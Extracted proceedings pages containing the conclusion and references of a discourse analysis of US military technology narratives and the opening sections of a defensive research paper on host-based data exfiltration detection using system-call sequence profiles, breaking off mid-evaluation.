important, winning the battle of narratives is "absolutely crucial". The report makes the conclusion that<br />

Dominating the narrative of any operation, whether military or otherwise, pays enormous<br />

dividends. [...] In the battle of narratives, the United States must not ignore its ability to<br />

bring its considerable soft power to bear in order to reinforce the positive aspects of Joint<br />

Force operations. Humanitarian assistance, reconstruction, securing the safety of local<br />

128


Saara Jantunen and Aki-Mauri Huhtinen<br />

populations, military-to-military exercises, health care, and disaster relief are just a few<br />

examples of the positive measures that we offer.<br />

This statement is interesting, as we have witnessed the emergence of operations 'other than war'. In<br />

the narrative of Operation Iraqi Freedom, the military leadership put much focus on the humanitarian<br />

aspect of the operation. But, the "battle of narratives" manifested itself not only in word choices such<br />

as liberate and humanitarian aid, but also as words such as precision-guided weapons. The emphasis<br />

of the use of precision guided munitions can be seen as semantic tactics. Technology is part of the<br />

narrative.<br />

JOE10 mentions the words deter and deterrence several times, and finally concludes that deterrence<br />

will be the "primary purpose" of the military forces. This explains the threat discourse: the only way to<br />

deter is to excel over the rest in skill, capacity and resources. Deterrence will be created by absorbing<br />

education and science: "The Services should draw from a breadth and depth of education in a range<br />

of relevant disciplines to include history, anthropology, economics, geopolitics, cultural studies, the<br />

‘hard’ sciences, law, and strategic communication", the report states. It also stresses that in future,<br />

asymmetric and irregular warfare will be more likely than conventional warfare, and that the U.S.<br />

military should be prepared for this:<br />

Irregular wars are more likely, and winning such conflicts will prove just as important to<br />

the protection of America’s vital interests and the maintenance of global stability.<br />

To summarize the report, we make the following conclusions: In strategy, techno-speak<br />

1. is part of the "battle of narratives"<br />

2. is based on threat discourse<br />

3. serves the function of deterrence<br />

The analysis uses these conclusions as the starting point for the linguistic part of the analysis.<br />

5.1 Narrating the doctrine: Effects Based Operations briefing<br />

This briefing aired on the same day when the coalition forces started the Operation Iraqi Freedom by<br />

bombing Baghdad. In this briefing, Colonel Gary Crowder (the division chief at Air Combat Command<br />

and the plans director for Strategy, Concepts and Doctrine) introduces the concept of Effects Based<br />

Operations (EBO) to the public. The role and type of technology descriptions in it will be discussed in<br />

this section.<br />

Two types of clauses are included in the analysis: those, where the 'doer' is technology, and those<br />

where the 'doer' is 'us' (the US, Coalition Forces, etc).<br />

When looking at the clauses where technology is the Actor, the main observations are that in these<br />

descriptions the typical process is a description of 'enabling', and the object of action (Goal or Range,<br />

often in a projected clause) is abstract or ambiguous:<br />

Table 1: Technology as a doer<br />

ACTOR PROCESS<br />

(material)<br />

BENEFICIARY<br />

1 these analytical tools enable us [...] to find alternative methodologies<br />

2 [PGM] [...] give us the ability for a large number of other<br />

aircraft besides just stealth aircraft to hit<br />

multiple weapons per targets.<br />

3 its stealth qualities enable us to do a large number of things<br />

4 [the stealth] enables us to do a lot more stuff<br />

5 the stealth does give us some capabilities in addition to the<br />

precision<br />

In action descriptions where the Actor is human or animate, there are two main types. The first type<br />

are the descriptions of dynamic military action and capability:<br />

129


Table 2: Human as a DOER<br />

ACTOR/<br />

CARRIER<br />

Saara Jantunen and Aki-Mauri Huhtinen<br />

PROCESS<br />

(material or relational)<br />

GOAL/RANGE/POSSESSED<br />

6 we were able to take down the air defense system<br />

7 we were able to neutralize those towers<br />

8 we can hit multiple targets<br />

9 we have much more dual-use capability in each of the Air Force's,<br />

Navy's and Marines' fighter<br />

aircraft as well as our<br />

bomber aircraft<br />

10 we have an improved ability to go after adversary's<br />

systems<br />

The action descriptions refer to the use of weapons and technology. In descriptions of military action,<br />

the process is typically material (physical) and the object of the action is inanimate and often abstract.<br />

The data also contains a number of possessive attributive action descriptions (having something),<br />

where the entity possessed is typically capability or ability, both abstract. The evaluation of the first<br />

ten sample clauses is positive. The Process (often combined with the Goal/Range) signal social<br />

esteem in the form of capacity; Technology and Self are described as competent, expert and<br />

powerful. The objects of action are inanimate, which signals Social Sanction: the one acting is good,<br />

moral and ethical by attacking non-human targets.<br />

The second type consists of action descriptions that are somewhere between material and mental<br />

processes:<br />

Table 3: Human as a doer<br />

# SENSER PROCESS (mental) PHENOMENON<br />

11 I would prioritize [...] those targets<br />

12 we look at the desired effects we want to create on the battlespace,<br />

13 we evaluate the target sets that we need to do, that -- those effects that we<br />

need to create on the battlespace<br />

14 we bring those together into a integrated plan<br />

15 we literally come up with a high heaven objective<br />

These descriptions highlight the analytical part of waging war: the planning and the creating of<br />

strategy. In this context we will analyze them as mental processes, because they are strongly<br />

contrastive to the material processes of attacking and neutralizing, and their purpose is to emphasize<br />

the role of the scientific and creative planning process in warfare. The evaluation in the above clauses<br />

is, just like in the first ten, positive. Capacity is signaled with descriptions of observation, consideration<br />

and learnedness. These Process types can further be characterized as perceptive and cognitive<br />

(Halliday, 2004: 210).<br />

To put it briefly, the source text emphasizes Capacity that is realized by descriptions of having both<br />

inner (ability, cognitive skills) and outer (material, technological) resources. Of all action, the emphasis<br />

is on inner experience: Weapons are of course used, but after a planning process that is described as<br />

highly scientific. In addition to action descriptions, the briefing contained a number of nominal<br />

constructions that are worth notice:<br />

Table 4: Nominalizations<br />

Nominal constructions: technology<br />

the combination of a fortuitous development of different capabilities and technologies<br />

the development of the laser-guided bombs<br />

the capability of a Joint Direct Attack Munition<br />

the evolution of about the last 20 years<br />

the evolution of both the Air Force and the Navy and Marine Corps' combat<br />

our ability to go after targets<br />

130


Saara Jantunen and Aki-Mauri Huhtinen<br />

The above nominalizations capture the semantic content of the action descriptions: development,<br />

capability, evolution, ability. The order of these nominalizations create a narrative of evolving and<br />

developing capability that finally is utilized as an ability. This narrative creates a concept of<br />

advancement and technological omnipotence.<br />

5.2 Discussion<br />

There are two major players in the Grand Narrative of War: Technology is the enabler, and 'we' are<br />

the able. The ability technology creates is to wage war effectively, precisely and securely and so save<br />

lives by avoiding casualties and collateral damage. Technology is the prerequisite for humanity in<br />

warfare. In this narrative, war has evolved into "Effects Based Operations" on one hand, and into<br />

humanitarian operations on the other. The result is war's new image, which is slowly drifting further<br />

and further away from the killing, and closer and closer to implementing humanity. This is the source<br />

of the binary rhetoric of 'bombing for peace' and 'destroying the village to save it'.<br />

The frequently occurring words capacity and capability are abstract subordinate terms that may mean<br />

anything from having financial or human resources to operate to meaning the quality of weapons<br />

systems, planning, or the mass of the actual weapons. These are everyday terms in strategy and<br />

operations discussed in public and allow the speaker to carry out the tactic of neutrality through<br />

vagueness.<br />

The technology descriptions in American war-speak execute the function of deterrence. As Joint<br />

Operational Environment 2010 (United States Joint Forces Command, 2010) concludes, the task of<br />

deterrence will be increasingly important. This, although, evokes the question whether the asymmetric<br />

and irregular enemy the report described can be deterred and if so, whether technology as a<br />

deterrence will work. Insurgents use inexpensive and asymmetric forms of combat, to which the U.S.<br />

responds with expensive counter measures. According to 2008 National Defense Strategy,<br />

deterrence must include both military and non-military tools, and that "changes in capabilities,<br />

especially new technologies" help to create a credible deterrence. Metz (2007: 65) elaborates on the<br />

logic of fighting insurgency with technology:<br />

Counterinsurgency experts long have argued that technology is unimportant in this type<br />

of conflict. While it is certainly correct that technology designed to find and destroy a<br />

conventional enemy military force had limited application, other types such as nonlethal<br />

weapons and robotics do hold promise for difficult tasks such as securing populated<br />

areas, preventing infiltration, and avoiding civilian casualties.<br />

While the counterinsurgency (COIN) strategy emphasizes the integration of military and non-military<br />

means, the military still turns to technology for answers. EBO, once justified with the promise of new<br />

technologies, has been abandoned and replaced with a 'Comprehensive Approach'. These new<br />

strategies (and if not old, then updated) are justified with 'even less' collateral damage and 'even<br />

better' precision - enabled by technology. The name of the applied strategies change, but the<br />

discourse (and the weapons used) remains the same. The deterrence the West imposes means<br />

smaller and smaller missiles (yet more lethal than ever), satellites and stealth drones (that both<br />

observe us and guide missiles) and cyberspace. Virilio (2009) calls this "aesthetics of disappearance".<br />

The collective Western outlook no longer tolerates alternatives that would make war visible. At the<br />

same time, we fear the unseen.<br />

The Joint Operating Environment 2010 (ibid.) also remarks that individual soldiers are increasingly<br />

"global communication producers". According to the report, in the "battle of narratives" the role of the<br />

"strategic corporal whose acts might have strategic consequences if widely reported" is big. By pressbriefing<br />

the media and embedding journalists in 'liberation operations', the military leadership is<br />

creating strategic communication that is convincing enough to appeal not only to the public, but also<br />

to the soldier that has to be supervised and controlled by the system and as part of the system - not<br />

as an individual. In the words of the COIN Field Manual: "Information operations (IO) must be<br />

aggressively employed" to "obtain local, regional, and international support for COIN operations" and<br />

"discredit insurgent propaganda and provide a more compelling alternative to the insurgent ideology<br />

and narrative".<br />

131


6. Conclusion<br />

Saara Jantunen and Aki-Mauri Huhtinen<br />

The Revolution in Military Affairs presents the new identity of war as a system of technologies, an<br />

ideology which manifests itself in military discourse. In addition, system thinking, such as EBO, has<br />

created the demand for both internal and external control in the Western military force. This<br />

combination of strategically significant military contractors, techno-faith and the need to dominate and<br />

control have led to strategic communication, which contains the Grand Military Narrative. According to<br />

this Grand Narrative, technology executes, with precision, reliability and from a distance, the duties<br />

determined by analytical, rational and morally virtuous humans. The public role of the military is to 'do<br />

good'. In this narrative, war is removed from the battle fields into the virtual.<br />

The binary roles of the military result in binary rhetoric, and this is very visible in the analysis<br />

introduced in this article. Whereas the adversary, the insurgents, conduct hands-on warfare based on<br />

the assumption that the insurgent will die in the process, the West distances itself from the discomfort<br />

both physically (drones and missiles) and mentally (distance and simulation) and tolerate no losses.<br />

'We' cling onto everything we have, whereas 'they' have little to lose. 'We' fight the enemy with the<br />

exact opposite way than they fight 'us': The US is portrayed as evolved and scientific, while the<br />

majority of the militaries in the rest of the world employ very different methods of warfare. This makes<br />

the discourse on the threats of asymmetric enemies interesting. Is it not the RMA that distanced 'us'<br />

from the enemy and created asymmetry, the Frankenstein we are now terrified of?<br />

The Grand Military Narrative is full of paradoxes. Rhetoric, strategy and reality do not meet. The result<br />

is that we are deterring an asymmetric enemy (that cannot be deterred) with weapons (that cannot be<br />

seen) and pay more than we can afford to in order to do so (while the enemy pays close to nothing).<br />

The paradox here is that in an arms race against asymmetric enemies, the winner is not the one who<br />

has the highest technology, but the one who tolerates the biggest losses.<br />

References<br />

Allen, Patrick D. (2010) Information Operations Planing, Boston: Artech House.<br />

Boisot, M. H., MacMillian, I. C. and Han, K. (2007) Explorations in Information Space. Knowledge, Agents, and<br />

Organisation, London: Oxford University Press.<br />

Campen, A. (1996) Cyberwar, Washington D.C.: AFCEA Press.<br />

Campen, A. (1992) The First Information Warfare: The Story of Computers and Intelligence Systems in the<br />

Persian Gulf War, Washington D.C.: AFCEA International Press.<br />

Czosseck, C. and Geers, K. (Eds.) (2009) The Virtual Battlefield: Perspectives on Cyber Warfare, Amsterdam:<br />

IOS Press.<br />

David, G. J. and McKeldin III, T.R. (Eds.) (2009) Ideas as Weapons. Influence Perception in Modern Warfare,<br />

Washington D.C.: Potomac Books.<br />

Der Derian, J. (2009) Virtuous War, New York: Routledge.<br />

Fainaru, S. and Klein, A. (2007) 'In Iraq, a Private Realm Of Intelligence-Gathering', Washington Post, 1 July,<br />

[Online], Available: http://www.washingtonpost.com [19 Oct 2010].<br />

Halliday, M.A.C. (2004) An Introduction to Functional Grammar. Revised by Matthiessen, C.M.I.M, London:<br />

Arnold.<br />

Johnston, W. (2010) 'War Games Lure Recruits For 'Real Thing'', NPR, 31 July, [Online],<br />

Available:http://www.npr.org/templates/story/story.php?storyId=128875936 [19 Oct 2010].<br />

Krishnan, A. (2009) Killer Robots. Legality and Ethicality of Autonomous Weapons, Burlington: Ashgate.<br />

Libicki, M. (1996) What is Information Warfare? Washington DC: National Defence University Press.<br />

Matthews, W. (2010) 'Smaller, Lighter, Cheaper: New Missiles Are 'Absolutely Ideal' for Irregular Warfare',<br />

Defense News, 31 May, [Online], Available: http://www.defensenews.com/story.php?i=4649372 [19 Oct<br />

2010]<br />

Metz, S. (2007) Learning from Iraq: Counterinsurgency in American strategy, [Online], Available:<br />

http://www.strategicstudiesinstitute.army.mil/pubs/download.cfm?q=752 [19 Oct 2010].<br />

Rantapelkonen, J. (2006) The Narrative Leadership of War: Presidential Phrases in the 'War on Terror' and their<br />

Relation to Information Technology. Doctoral Dissertation. Publication Series 1, Research n:o 34, Helsinki:<br />

National Defence University.<br />

Risen, J. & Mazzetti, M. (2009) 'C.I.A. Said to Use Outsiders to Put Bombs on Drones', New York Times, 20 Aug,<br />

[Online], Available: http://www.nytimes.com/2009/08/21/us/21intel.html [19 Oct 2010].<br />

Stahl, R. (2010) Militainment, INC. War, Media, and Popular Culture, New York: Routledge.<br />

Shimko, K. L. (2010) The Iraq Wars and America’s Military Revolution, New York: Cambridge University Press.<br />

Soeters, J., van Fenema P.C., & Beeres, R. (Eds.) (2010) Managing Military Organizations: Theory and practice,<br />

London: Routledge.<br />

Taylor, P. (2003) Munitions of the Mind: A History of Propaganda from the Ancient World to the Present Day, 3rd<br />

edition, Manchester: Manchester University Press.<br />

132


Saara Jantunen and Aki-Mauri Huhtinen<br />

Thearmyexperience (2008) Inside the Army Experience Center, [video online]<br />

Available:http://www.youtube.com/watch?v=-lZKV9bP_0Q [19 Oct 2010]<br />

Toffler, A. (1981) The Third Wave, New York: Bantam Books.<br />

Toffler, A . & Toffler, H. (1993) War and Anti-War: Survival at the Dawn of the 21st Century, Boston: Little, Brown<br />

& Co.<br />

United States Joint Forces Command. (2010) The Joint Operating Environment 2010 [Online], Available:<br />

http://www.jfcom.mil/newslink/storyarchive/2010/JOE_2010_o.pdf [19 Oct 2010].<br />

U.S. Department of Defense (2008) 2008 National Defense Strategy, [Online], Available:<br />

http://www.defense.gov/news/2008%20national%20defense%20strategy.pdf [19 Oct 2010]<br />

U.S. Department of Defense (2003) Effects Based Operations Briefing. Transcript, 19 March, [Online], Available:<br />

http://www.defense.gov/Transcripts/Transcript.aspxTranscriptID=2067 [19 Oct 2010]<br />

Wichner, D. (2010) 'Raytheon's new Griffin fit for drone', Arizona Daily star, 22 Aug, [Online] Available:<br />

http://azstarnet.com/business/local/article_ff437ef6-c69d-56c6-aeff-e74d0d5902b9.html [19 Oct 2010]<br />

Ventre, D. (2007) Information Warfare, London: Wiley.<br />

Virilio, P. (2009) The Aesthetics of Disappearance, Translated by Philip Beitchman, Los Angeles: Semiotext(e).<br />

Virilio, P. (1989) War and Cinema. The Logistics of Perception, Translated by Patrick Camiller, London: Verso.<br />

Wiest, A. (2006). Rolling Thunder in a Gentle Land – The Vietman War Revisited, London: Osprey Publishing.<br />

Zizek, S. (2009). Pehmeä vallankumous. Translated by Janne Porttikivi, Helsinki: Gaudeamus.<br />

Unpublished<br />

XX. (2010) “On Making War Possible: Strategic Thinking, Soldiers’ Identity, and Military Grand Narrative”.<br />

(Unpublished manuscript in Security Dialogue)<br />

133


Host-Based Data Exfiltration Detection via System Call<br />

Sequences<br />

Brian Jewell 1 and Justin Beaver 2<br />

1<br />

Tennessee Technological University, Cookeville, USA<br />

2<br />

Oak Ridge National Laboratory, Oak Ridge, USA<br />

bcjewell21@tntech.edu<br />

beaverjm@ornl.gov<br />

Abstract: The host-based detection of malicious data exfiltration activities is currently a sparse area of research<br />

and mostly limited to methods that analyze network traffic or signature based detection methods that target<br />

specific processes. In this paper we explore an alternative method to host-based detection that exploits<br />

sequences of system calls and new collection methods that allow us to catch these activities in real time. We<br />

show that system call sequences can be found to reach a steady state across processes and users, and explore<br />

the viability of new methods as heuristics for profiling user behaviors.<br />

Keywords: data exfiltration, data security, intrusion detection<br />

1. Introduction<br />

A successful attack on an organization involving the theft of sensitive data can be devastating. Data<br />

exfiltration is the term used to describe this type of theft and can be defined as the unauthorized<br />

transfer of information from a computer system. Data exfiltration attacks represent a tremendous<br />

threat to both government entities and commercial enterprises.<br />

Government organizations maintain repositories for sensitive and classified information, and breaches<br />

into protected systems or leaks into the public domain can have implications that threaten national<br />

security. Commercial enterprises manage complex levels of proprietary tools and data that, if<br />

compromised, could endanger the financial security of their institutions and/or their customers. Recent<br />

studies find that information leaks are the most prevalent security threat for organizations 0 and that in<br />

recent years attackers have exfiltrated more than 20 terabytes of data, much of which is sensitive,<br />

from the U.S. Department of Defense and Defense Industrial Base organizations, as well as civilian<br />

government organizations 0.<br />

Despite the threat, the approach to defending against these attacks is surprisingly unsophisticated.<br />

Off-the-shelf intrusion detection systems (IDS) monitor for known malicious network signatures at the<br />

system boundary. These systems are relied upon to flag potential network breaches, which are then<br />

typically investigated manually (often these are guided analyses that leverage custom-built scripts) in<br />

order to trace potential unauthorized activities. Unfortunately, the model of perimeter defense leaves<br />

attackers free to navigate, investigate, and extrude information if the perimeter is breached<br />

undetected.<br />

Host intrusion detection systems (HIDS) are software programs that run on each computer host in a<br />

network and attempt to detect malicious events in the operation of the host. Commercial virus<br />

protection packages (McAfee, 2003) are examples of HIDS and monitor system services, registry<br />

changes, and check individual files for signatures of known malicious programs. We approach the<br />

detection of data exfiltration attacks as a HIDS. Once the boundary defense is breached, it is from the<br />

individual hosts that a malicious user will explore file systems, package data, and export it to an<br />

outside network. We postulate that, given insight into the activities of individual users and processes<br />

on a given host, acts of unauthorized data exfiltration can be discriminated from normal user/process<br />

behaviors.<br />

Our hypothesis hinges on the availability of low-level data that reflects the operation of processes on<br />

a computer host. We propose to achieve this insight into the computer’s operation through the<br />

monitoring of system calls, which are low-level process interactions with the host computer’s<br />

operating system. System calls provide a window into what all processes and users on a host<br />

machine are executing, regardless of how they are interacting with the machine. In addition, they<br />

provide more fidelity in identifying individual actions than a process monitor.<br />

134


Brian Jewell and Justin Beaver<br />

In this paper, we propose the use of a method by which unique sequences of system calls, managed<br />

at the process/user level, are the basis for discriminating normal and anomalous behaviors by users<br />

for use as an exfiltration detection agent. We then evaluate this model to fit our 3 criteria for a viable<br />

detection agent.<br />

Tractable- The chosen method must be able to run in real time while having negligible effect on a<br />

system as experienced by the end user.<br />

Environmentally Neutral- Our method must also be portable and adapt to any environment.<br />

Responsive- Lastly, our ideal method should reliably report on data exfiltration behaviors.<br />

The following sections are organized as follows: Section 2 provides a review of similar work. Section 3<br />

formalizes the methodology we used to categorize normal behavior and collect a profile from the<br />

system call data traces. Section 4 evaluates our method according to the 3 criteria we set, and<br />

Section 5 gives a detailed account of our results, conclusions, and ideas for future work.<br />

2. Related work<br />

The detection of data exfiltrations has been a recent focus of cyber security research. Exfiltration<br />

detection is a difficult problem due to the wide range of methods available, and the subtlety with which<br />

it can be performed 0. Current IDS systems are mostly concerned with intrusion attempts, although<br />

there are extrusion detection systems that are commercially available (e.g., 0. Like network-based<br />

IDSs, these are primarily signature-based solutions that perform network traffic analysis through<br />

custom hardware.<br />

Many more advanced data analysis approaches have been proposed, including clustering of network<br />

traffic for anomaly detection 0, the application of statistical and signal processing methods to<br />

outbound traffic for signature identification 0, and the application of data mining techniques 0 to<br />

network data. These approaches yielded varying degrees of success, but inevitably were plagued<br />

with base-rate fallacy 0 issues or a narrow problem focus.<br />

However, when we look at previous work on host-based IDSs there is some inspiration for host-based<br />

data exfiltration detection. In 1996, Forrest, et al, proposed a host-based intrusion detection method<br />

based on the monitoring of system calls (Forrest, 1996). This early work was inspired by the human<br />

immune system's ability to recognize what cells are part of the host organism (it's self) or foreign (nonself).<br />

They used this principle in developing their own methodology for constructing a "sense of self"<br />

for Unix based systems using available system trace data.<br />

Forrest’s methodology used lookahead pairs, or sets containing pairs of system calls formed by the<br />

originating system call and the one that follows it with spacing 1, 2, 3, .. k. These pairs were used to<br />

form a database of normal process behavior (or self), and used to monitor for previously unfound<br />

patterns, that were then tagged as anomalous (or non-self). While their results were only preliminary,<br />

they did show that a stable signature of normal process behavior could be constructed using very<br />

simple methods.<br />

Many other approaches have been taken since to model the behavior of processes using system<br />

calls, including the use of Hidden Markov Models (HMM) (Gao, 2006), neural networks (Endler, 1998),<br />

k-nearest neighbors (Liao, 2002), and Bayes models (Kosoresow, 1997). These models were all<br />

developed in hopes of producing more accurate models while reducing false positives which comes at<br />

a high computational cost. The most notable advantage of Forrest's model is the ability to track<br />

processes for anomalous behavior at the application layer of each individual host in real time at a very<br />

low computational cost.<br />

Forrest et al., later improves upon their work in (Forrest, 2008) by introducing another simple model<br />

that is suitable for real-time detection dubbed sequence time-delay embedding (stide), and again<br />

involves the enumeration of system call sequences. However, this time their method uses contiguous<br />

sequences of fixed length to form a database of normal behavior. They also introduce a new<br />

modification to their method called sequence time-delay embedding with frequency threshold (t-stide).<br />

This method explores the hypothesis that sequences with very low occurrence rates in training data<br />

are suspicious.<br />

135


Brian Jewell and Justin Beaver<br />

Forrest et al. tested these methods against 2 popular machine learning methods. One based on<br />

RIPPER - a rule learning system developed by William Cohen (Cohen, 1995) that was later adapted<br />

by Lee et al. (Lee 1998, 1999) to learn rules to predict system calls and find anomalies, and the other<br />

based on HMMs as used in (Gao, 2006). While they weren't able to show that stide performed better<br />

than the other methods, they did conclude that it performed comparably to more complicated<br />

methods.<br />

Our work is most closely paralleled by that of Forrest and leverages host-based system call<br />

information to detect anomalous user behaviors. Unlike previous work, we seek to implement and<br />

adapt this approach as an analysis process that is user and process centric to detect data exfiltration<br />

agents.<br />

3. Methodology<br />

Our model for data exfiltration detection focuses on the analysis of system calls used in a host’s<br />

operation and hinges on observations similar to that found in previous works by Forrest et al. (Forrest,<br />

2008). This section justifies the use of sequences of system calls as a mechanism for defining normal<br />

behaviors in Section 3.1, discusses variants in optimizing system call sequences in Section 3.2, and<br />

compares these variants for use as data exfiltration detectors in Section 3.3.<br />

3.1 Defining normal in sequences of system calls<br />

A system call trace or system call sequence is the ordered list of system calls as invoked by a process<br />

that spans the length of execution by a given user. An example system call trace for a given user<br />

might be:<br />

“..., open, read, fstat, fstat, write, close, mmap,...”,<br />

where “open”, “read”, “fstat” , etc. are all examples of system call executable names. All invoked user<br />

operations, whether a command line imperative or in the operation of a running program, use various<br />

combinations of system calls to complete their tasking. Even simple commands, such as a directory<br />

listing, use a sequence of multiple system calls to execute.<br />

While there are a number of current methods to enumerate system call sequences, there is a<br />

common theme: to form a data store of traces that are used to characterize normal behaviors (also<br />

referred to as a normal profile) in a given environment. Once the data store is established, it can be<br />

used as the basis for identifying future sequences as normal (within the set) or anomalous (not<br />

included in the set). In addition, it is desirable for any automated comparison of this profile with<br />

experienced events to be computationally tractable.<br />

Previous research (Forrest, 2008) on host-based IDSs that has attempted to use system call<br />

sequences to detect anomalous behaviors has concentrated on detecting anomalies in program<br />

execution. That is, the focus of the analysis is on individual processes and their execution but did not<br />

take into account the uniqueness of each individual user.<br />

By contrast, when attempting to detect data exfiltrations, we are more interested in the behavior<br />

specific to a user. However, in order to create a normal profile that is specific to a user, it must be<br />

established that system call sequences are suitable for discriminating normal and anomalous<br />

behaviors in such a context.<br />

Given that, experientially, user behavior seems to vary drastically depending on the task being<br />

performed at any given moment, it is necessary to support the claim that unique system call<br />

sequences for a user can be generalized.<br />

We performed an experiment in which the unique system call sequences for individual users were<br />

tracked. The results of this experiment are illustrated in Figure 1. We define a stable profile as one<br />

that plateaus at a given size (N sequences). It's the asymptotic nature of the line that makes the<br />

anomalous detection possible.<br />

That is, in a given trace, the number of sequences generated can always be observed to "step" or to<br />

plateau under normal usage and to increase suddenly when a user performs a new or unusual action.<br />

136


Brian Jewell and Justin Beaver<br />

Figure 1 demonstrates that, despite varying operations by users, a normal profile can be established<br />

and characterized by a tractable (< 200) number of unique system call sequences.<br />

Figure 1: Number of unique system call sequences for a given user/process versus the total number<br />

of system calls<br />

3.2 Models for system call sequences<br />

For our testing we implemented three different simple methods for enumerating system calls. The first<br />

of these methods is implemented very similarly to stide (Warrender, 1999). The method uses a sliding<br />

window of size N across all system calls included in a trace to form the sequences. However, we have<br />

adapted the method to incorporate UID/process name pairs to create a profile of our trace data.<br />

We also wanted to take care in choosing an appropriate value of N to be used with our<br />

implementation. The best value for N that is used for stide and similar implementations is discussed in<br />

a number of previous works. Kosoresow et al. (Kosoresow, 1997) suggest “the best sequence length<br />

to use would be 6 or slightly higher than 6.” And Kymie 0 in a paper dedicated to the singular question<br />

of “Why 6?” provide evidence supporting the conjecture empirically.<br />

However, while evaluating our own variable sequence length method we identify another possible and<br />

more fundamental reason to pick a sequence size of 6. In Figure 2 we see the number of unique<br />

sequences present in a complete “normal” profile generated by our variable length sequence collector<br />

over one week.<br />

It is interesting to note the dramatic decrease in the number of sequences that occur with a length<br />

greater than 6. As the value of N increases we increase the accuracy of the profile generated<br />

proportionately to the percentage of system call sequences that fall under that size. However, we also<br />

increase our learning time and profile complexity by the same proportions. Therefore, for our<br />

experiments we also use 6 for the length of our sequences<br />

The next model is designed to avoid the apparent shortcomings of the windowing method. Many<br />

sequences of length 1 or 2 can be observed as repeating continuously, making a perfect fit with the<br />

windowing method requires substantial unnecessary overhead. This is also demonstrated in Figure 2.<br />

This leads us to theorize that a method utilizing a variable window length would perform better than<br />

the previous methods.<br />

While developing an approach to create variable sequences of system calls it was important to<br />

preserve the low run time complexity of the sliding window method while attempting to better model<br />

normal behavior. Thus, a simple solution was chosen. In order to construct our variable sequences we<br />

chose a subset such that sequence length is maximized while no one system call is repeated. This is<br />

implemented by constructing a sequence as calls are being traced and beginning a new sequence<br />

when a call is found to be a repeat in the current sequence.<br />

137


Brian Jewell and Justin Beaver<br />

Figure 2: Number of unique sequences observed with the size N (x-axis)<br />

Up to this point we ignore the additional information about each system call in building our normal<br />

profile. Thus, we implement a third method that additionally uses errno, and function arguments in<br />

matching sequences.<br />

The method uses the same methodology as the variable length sequences. Unique system call<br />

sequences are selected in such a way that length is maximized while no one system call is repeated<br />

in a given sequence. However, here we define a system call as {probefunc, errno, args}.<br />

3.3 Comparison and discussion<br />

To validate our methods we tested them against each other. In Figure 3 we show the increase in<br />

number of sequences generated over one week of collection for a given UID/execname pair. From<br />

Figure 3 we can observe that the variable sequence length method both finishes training of a normal<br />

sequence faster and uses less sequences than both of the other methods as hoped. This is likely in<br />

part due to the observation that the majority of sequences have a length less than 6 and the smaller<br />

the sequence the more that they repeat. (Refer back to Figure 2)<br />

Other observations we can make from Figure 3 is that the variable with arguments method reaches a<br />

stable state faster than the windowing method and without an unacceptable large increase in the<br />

number of unique sequences. Again, this is most likely due to the better fitting of high frequency<br />

sequences.<br />

The surprise comes in how poorly the windowing method performs in terms of generating a stable<br />

profile. Overall the windowing method performs well, but when the testing is stretched over the period<br />

of a week the method fails to show the same level of stabilization as the other 2 methods. Thus, for all<br />

purposes the variable method seems superior, with the addition of arguments requiring a much large<br />

database which correlates to a lot more false positives. Since detection speed and precision are what<br />

we’re interested in, we’ll be using the variable method for the remainder of our testing.<br />

Figure 3: Three sequence collection methods (SEQ - windowing, VAR - variable, VARARG - variable<br />

with arguments) compared by number of unique sequences generated<br />

138


4. Evaluation<br />

Brian Jewell and Justin Beaver<br />

We now evaluate the method prescribed in the previous section against our three criteria for our ideal<br />

exfiltration detection agent.<br />

4.1 Tractable<br />

Perhaps the largest singular challenge encountered during the implementation of this project is the<br />

task of collecting and managing the torrent of system calls that occur during normal to heavy use of a<br />

modern computer. Each user or process action can result in hundreds of system calls and in our own<br />

experiments logging system call activity alone generates a gigabyte of data per hour. In previous work<br />

(Kang, 2005; Forrest, 2008) this problem is sidestepped mainly by concentrating on individual<br />

processes/users/calls and/or using previously collected data.<br />

Unlike prior efforts, we are interested in tracing all system calls across multiple users to track their<br />

behavior in real time, and we also desire to deploy a swift analysis of that data without noticeably<br />

degrading system performance or destabilizing the system. While researching options for this we<br />

found an existing commercial solution that meets all of our needs.<br />

Dtrace (Dtrace, 2009) is a software tool that is designed specifically for low impact system call tracing<br />

for system administration and debugging. More importantly, it can be configured to collect the<br />

required system call data with negligible effect on system performance, such as timestamp, user and<br />

process identifiers, executable names, error numbers, and executable arguments.<br />

Another challenge is the management of the collected data. Retaining and cataloging all the system<br />

calls for analysis at a later time is impractical given the observed data rate of over 1 gigabyte per<br />

hour. As we previously discussed, by collecting just the unique sequences that form our profile of<br />

normal behavior in real time we elegantly address this problem.<br />

Figure 1 shows the increase in number of unique system calls for the 1/java pair in an hour long<br />

system call set using our variable sequence model. This pair was chosen because of the volume of<br />

system calls that are produced while the program was actually conducting only a few functions<br />

repeatedly. Over the course of approximately 1.4 million system calls generated by 1/java contained<br />

the trace, only 196 unique sequences were recorded. It's this quick stabilization and small normal<br />

profile that combine with the advantages of Dtrace to make our implementation light-weight with very<br />

low observable impact on system performance.<br />

4.2 Environmentally neutral<br />

In order to validate that we can distinguish a normal profile of one user/process apart from another<br />

regardless of environmental conditions such as the operating system or other operational conditions,<br />

we must first explore the “diversity hypothesis” similar to that put forth by Forrest et al. in (Forrest<br />

2008). Their hypothesis states that the code paths executed by a process are highly reliant upon the<br />

usage patterns of the users, configuration, and environment hence causing what is considered to be<br />

normal to differ widely from one installation to the next.<br />

While the methods used to create the sequences that Forrest et al. are similar they focus solely on<br />

program execution, the same diversity should theoretically still exist between the profiles generated by<br />

our methods when per user patterns are added as a controlling factor. In addition it may also be<br />

possible to determine the degree of impact changes such as different operating systems and varying<br />

users have upon a normal profile. We can observe this in our own testing by comparing the various<br />

collected profiles from different users and operating systems.<br />

Table 1: Comparison of normal profiles generated by different users by platform<br />

User 1B Linux (User1) Solaris (User1)<br />

User 1A 0.91129591 0.16700353 0.19755409<br />

User 1B 1 0.14119998 0.13764726<br />

User 2 0.25793254 0.13287113 0.12885861<br />

User 3 0.30644131 0.17470944 0.20602069<br />

139


Brian Jewell and Justin Beaver<br />

For this testing we had 3 different users (User 1A, User 2, and User 3 in Table 1) run our variable<br />

sequence collection algorithm for approximately 1 hour. All users were using Mac OSX on separate<br />

machines. In addition, we had User 1 repeat the same collection process on a separate date using<br />

Linux and Solaris operating system on different machines trying to keep behavior as similar as<br />

possible.<br />

The most significant result is that profiles from User 1A and User 1B have a >90% match while<br />

profiles generated from the other 2 users did not exceed 31% when compared to User 1. This seems<br />

to confirm that there is significant variation between profiles of one user from another.<br />

Perhaps the disappointment here is that correlation between User 1A and User 1B profiles wasn't<br />

